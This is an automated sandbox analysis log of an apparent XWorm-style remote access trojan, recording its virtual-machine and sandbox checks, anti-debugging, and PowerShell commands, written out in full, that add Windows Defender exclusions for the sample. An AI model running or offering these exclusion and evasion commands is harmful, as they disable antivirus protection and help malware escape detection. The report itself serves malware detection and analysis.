                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Check if machine is in data center or colocation facility
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: VJV2AjJ7Na.exe, XClient.exe.0.drBinary or memory string: SBIEDLL.DLL[KQVEAADJV2MDE4GHAGXTU8C321XVZSDZIXNFTLGE1AZKK[AENBARYRKLIUZXZOTIZ5BPCJQ1K1XMK9EEIDHICQBAC00[YTHAYU1Q6YFATK6OJXZM2MXWARFUJS9TQLK6GGMSGCC9R[LR3DU7BVU63TBHQOHKWQPTFDDI7NP1NNLX5X1IYWOG9OC[DJDW2DRXRVHHOUNEOTJ0OYQM8KFYSO5RX1VQ8GARTRALO[QPKFAJ97Y9Z1MOMYBXXBJFBPXBZI35QEWQSULAGX5BPNB[IZXC0HM5MUSNBUW6NMLWQZUEYKSEQCPSHPRV8DBHLG82H[O5Q21X0I7WNGFNU6IZNKFM6BDSCAB063JZOAMXNQSASWS[5C2Z3QQ79A0C6CGAZ3AGODUEZTSGHY94BNWIFGEZK52U8[EBVRUTYO3TU6XFRYSOUTMNJ5UAESUS02HXU4XZPYIGMGE[N2F7YY7JZINY8RVVSNURHMNDZIVI8UZOIWFBNFPSOR8LH[0KI0R4NUC92ZTDK4H2TZKDWWUFZVN8RANQ9ASBCJANSM5[EH4ZUSNC2A07ZPNLRVMIUSYDS7NWRVUQFBSFLEEKOMU97[RIL69ND6IPOCBI58TFJXYX5HU70U0C6JJSX9FOFECFBQPINFO
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeMemory allocated: 1A9A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599782Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599657Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599532Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599407Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599282Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599157Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599047Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598938Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598813Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWindow / User API: threadDelayed 8395Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWindow / User API: threadDelayed 1445Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5152Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4697Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7556Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2058Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7349Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2200Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7713
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1962
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599782s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599657s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599532s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599407s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599282s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599157s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599047s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -598938s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -598813s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 7556 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 2058 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep count: 7349 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep count: 2200 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 7713 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 1962 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599782Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599657Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599532Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599407Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599282Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599157Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599047Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598938Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598813Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: XClient.exe.0.drBinary or memory string: vmware
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3391026610.000000001B7B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD346972A1 CheckRemoteDebuggerPresent,0_2_00007FFD346972A1
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                          Bypasses PowerShell execution policy
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2

                          Language, Device and Operating System Detection

                          barindex
                          Yara detected Telegram Recon
                          Source: Yara matchFile source: VJV2AjJ7Na.exe, type: SAMPLE
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeQueries volume information: C:\Users\user\Desktop\VJV2AjJ7Na.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
